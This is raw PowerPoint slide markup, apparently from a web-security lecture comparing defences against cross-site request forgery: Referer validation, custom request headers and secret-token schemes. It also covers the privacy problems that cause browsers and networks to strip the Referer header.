            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Custom HTTP Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Text Box 5"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86032" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1008"/>
              <a:ext cx="2544"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3" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1035"/>
              <a:ext cx="2604" cy="213"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86030" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2050"/>
              <a:ext cx="2880"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1" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2078"/>
              <a:ext cx="2986" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referer: http://www.facebook.com/home.php</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="5867400"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86028" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="2208"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29" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3078"/>
              <a:ext cx="2248" cy="213"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86024" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2286000"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86025" name="Picture 16"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="3943350"/>
            <a:ext cx="1524000" cy="721895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86026" name="Picture 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524000" y="5613400"/>
            <a:ext cx="1028700" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="86027" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2552700" y="2247900"/>
            <a:ext cx="800100" cy="95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457200" y="274638"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Requests include a hard-to-guess secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Unguessability substitutes for unforgeability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Variations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-independent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Session-dependent token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>HMAC of session identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87044" name="Picture 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="503238"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="87045" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="465138"/>
            <a:ext cx="800100" cy="95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Secret Token Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88067" name="Content Placeholder 4" descr="Picture 13.png"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="-9982" r="-9982"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1495425"/>
            <a:ext cx="8458200" cy="5057775"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5872163"/>
            <a:ext cx="8253413" cy="681037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="38100" dir="2700000" algn="br" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="42999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Oval 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="5991225"/>
            <a:ext cx="4078288"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FFFFFF"/>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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1066800" y="1828800"/>
          <a:ext cx="7286625" cy="3276600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s480377" name="Image" r:id="rId3" imgW="8076190" imgH="3631746" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Image" r:id="rId3" imgW="8076190" imgH="363174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7286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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Referer Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Text Box 4"/>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dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Validation Defense</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: http://www.facebook.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: http://www.attacker.com/evil.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Lenient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Doesn't work if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Strict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>validaton</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure, but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is sometimes absent…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="1752600"/>
            <a:ext cx="554037" cy="655637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="ECD882"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5500">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5500">
              <a:solidFill>
                <a:srgbClr val="CC0000"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89093" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2179637"/>
            <a:ext cx="482600" cy="655638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5500">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89094" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7793037" y="2705100"/>
            <a:ext cx="439738" cy="769937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
              <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>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Referer Privacy Problems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90115" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Referer may leak privacy-sensitive information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://intranet.corp.apple.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		projects/iphone/competitors.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Common sources of blocking:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Network stripping by the organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Network stripping by local machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Stripped by browser for HTTPS -&gt; HTTP transitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>User preference in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:rPr>
              <a:t>Buggy user agents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Site cannot afford to block these users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r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Suppression over HTTPS is low</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6146" name="Object 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="779462" y="1717675"/>
          <a:ext cx="7526338" cy="3692525"/>
        </p:xfrm>
        <a:graphic>
